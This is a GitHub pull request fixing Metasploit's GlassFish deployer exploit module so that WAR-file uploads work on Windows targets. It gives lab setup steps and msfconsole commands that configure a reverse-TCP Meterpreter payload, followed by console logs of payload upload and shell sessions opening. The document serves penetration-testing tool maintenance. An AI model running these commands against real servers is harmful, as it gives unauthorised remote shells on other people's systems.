Fix #7247, Glassfish failing to upload the war file on Windows setups #7255

Merged
merged 2 commits into from Sep 14, 2016

@wchen-r7 wchen-r7 commented Aug 30, 2016

What This Patch Does

This patch fixes a problem in exploits/multi/http/glassfish_deployer. On Windows setups, the Glassfish module fails to upload the war file due to some missing fields in the HTTP POST request. However, this does not actually affect Linux setups even with the same Java version or GlassFish version.

Fix #7247

Verification for Linux

  • Get a clean Ubuntu box
  • On the Ubuntu box, install Java like this: sudo apt-get install default-jdk. This should get you JDK8.
  • Download GlassFish 4.0
  • Unzip glassfish-4.0, navigate to the bin directory, and then start asadmin
  • In the asadmin console, do start-domain domain1. This will start GlassFish.
  • Still on the Ubuntu box, open http://localhost:4848 with a browser
  • On the left menu, click on "Domain"
  • On the right, click on "Administrator password"
  • Set a new password for admin
  • On the left menu, click on "server (Admin server)"
  • On the right, click on the "Secure Administrator" button
  • Click on "Enable Secure Admin"
  • You will have to wait for up to a minute to make sure Glassfish is up and running again. You can check this by checking port 4848.

At this point, you are ready to test the module:

  • Start msfconsole
  • Do: use exploit/multi/http/glassfish_deployer
  • Do: set RHOST [IP to GlassFish]
  • Do: set PASSWORD [password to admin]
  • Do: set SSL true
  • Do: set target 1
  • Do: set payload java/meterpreter/reverse_tcp
  • Do: set LHOST [YOUR IP ADDRESS]
  • Do: exploit
  • You should get a session like the following:
msf exploit(glassfish_deployer) > run

[*] Started reverse TCP handler on 192.168.146.1:4444 
[*] Glassfish edition: GlassFish Server Open Source Edition  4.0
[*] Trying to login as admin:sploit
[*] Uploading payload...
[*] Successfully uploaded
[*] Executing /goTKJKUgGDWQ59unsbqG0g0W9a9a/ba05giTjZqnIEGi.jsp...
[*] Sending stage (46112 bytes) to 192.168.146.174
[*] Meterpreter session 4 opened (192.168.146.1:4444 -> 192.168.146.174:38476) at 2016-08-30 16:06:45 -0500
[*] Getting information to undeploy...
[*] Undeploying goTKJKUgGDWQ59unsbqG0g0W9a9a...
[*] Sending stage (46112 bytes) to 192.168.146.174
[*] Meterpreter session 5 opened (192.168.146.1:4444 -> 192.168.146.174:38402) at 2016-08-30 16:07:04 -0500
[*] Undeployment complete.

meterpreter >

Verification for Windows

And then at that point, you are ready to test the module:

  • Start msfconsole
  • Do: use exploit/multi/http/glassfish_deployer
  • Do: set RHOST [IP to GlassFish]
  • Do: set PASSWORD [password to admin]
  • Do: set SSL true
  • Do: set target 1
  • Do: set payload java/meterpreter/reverse_tcp
  • Do: set LHOST [YOUR IP ADDRESS]
  • Do: exploit
  • You should get a session like the following:
msf exploit(glassfish_deployer) > run

[*] Started reverse TCP handler on 192.168.146.1:4444 
[*] Glassfish edition: GlassFish Server Open Source Edition  4.1
[*] Trying to login as admin:sploit
[*] Uploading payload...
[*] Successfully uploaded
[*] Executing /jUYou3/eukJz1.jsp...
[*] Sending stage (46112 bytes) to 192.168.146.165
[*] Meterpreter session 6 opened (192.168.146.1:4444 -> 192.168.146.165:55916) at 2016-08-30 16:14:05 -0500
[*] Getting information to undeploy...
[*] Undeploying jUYou3...
[*] Undeployment complete.

meterpreter > 

@tdoan-r7 tdoan-r7 added the rn-fix release notes fix label Aug 30, 2016
@wchen-r7 wchen-r7 assigned wchen-r7 and unassigned wchen-r7 Aug 30, 2016
@jbarnett-r7 jbarnett-r7 self-assigned this Sep 14, 2016
@jbarnett-r7 jbarnett-r7 merged commit 445a43b into rapid7:master Sep 14, 2016
@tdoan-r7

Release Notes

This patch fixes a problem in exploits/multi/http/glassfish_deployer. On Windows setups, the Glassfish module fails to upload the war file due to some missing fields in the HTTP POST request. However, this does not actually affect Linux setups even with the same Java version or GlassFish version.

Labels
bug module rn-fix release notes fix
Development

Successfully merging this pull request may close these issues.

glassfish_deployer cannot upload the malicious war file
3 participants